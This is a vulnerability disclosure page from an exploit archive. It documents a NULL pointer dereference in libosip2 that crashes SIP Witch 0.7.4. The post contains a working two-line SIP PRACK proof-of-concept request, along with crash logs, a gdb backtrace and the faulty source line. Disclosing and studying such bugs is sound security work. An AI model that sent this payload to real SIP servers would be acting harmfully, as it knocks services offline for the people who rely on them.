what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

SIP Witch 0.7.4 Denial Of Service

SIP Witch 0.7.4 Denial Of Service
Posted Mar 6, 2013
Authored by AKAT-1, 22733db72ab3ed94b5f8a1ffcde850251fe6f466, c8e74ebd8392fda4788179f9a02bb49337638e7b

SIP Witch version 0.7.5 with libosip2-4.0.0 suffers from a NULL pointer dereference denial of service vulnerability.

tags | exploit, denial of service
SHA-256 | 0357bac6b7df26994440977542ae1d9cda8b64bfa51a8804b5459fcdb58e6dda

SIP Witch 0.7.4 Denial Of Service

Change Mirror Download
####################################
# SIP Witch 0.7.4 w/libosip2-4.0.0 #
####################################
#
# Authors:
#
# 22733db72ab3ed94b5f8a1ffcde850251fe6f466
# c8e74ebd8392fda4788179f9a02bb49337638e7b
# AKAT-1
#
#######################################

* DoS by the NULL pointer derefence in libosip2. True, found in the ancient version of sipwitch
(default in BT5) but the problem lies in the library used by it and may affect other software.
Found independently of http://lists.gnu.org/archive/html/linphone-developers/2012-07/msg00019.html

POC (request):
-- cut --
PRACK sip:1@127.0.0.1:5060;transport=udp SIP/2.0
Call-ID: a
-- cut --

Results:
-- cut --
sipw[25179]: segfault at 8 ip 00007fae01583b20 sp 00007fadfed09d38 error 4 in libosipparser2.so.4.2.0[7fae01571000+25000]

Core was generated by `/usr/sbin/sipw -d'.
Program terminated with signal 11, Segmentation fault.
(gdb) bt
#0 0x00007f1d4522bb20 in osip_list_get_first () from /usr/lib/libosipparser2.so.4
#1 0x00007f1d4544a6b7 in __osip_remove_ict_transaction () from /usr/lib/libosip2.so.4
#2 0x00007f1d4544bc15 in osip_transaction_free () from /usr/lib/libosip2.so.4
#3 0x00007f1d4544c0a9 in osip_transaction_init () from /usr/lib/libosip2.so.4
...
(gdb) disas
Dump of assembler code for function osip_list_get_first:
=> 0x00007f2f661c6b20 <+0>: mov (%rdi),%eax
...
(gdb) i r
rax 0x0 0
...
-- cut --

osipparser2/osip_list.c#221:
-- cut --
void *
osip_list_get_first (osip_list_t * li, osip_list_iterator_t * iterator)
{
if (0 >= li->nb_elt) <-- NPD
...
-- cut --

EOF
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close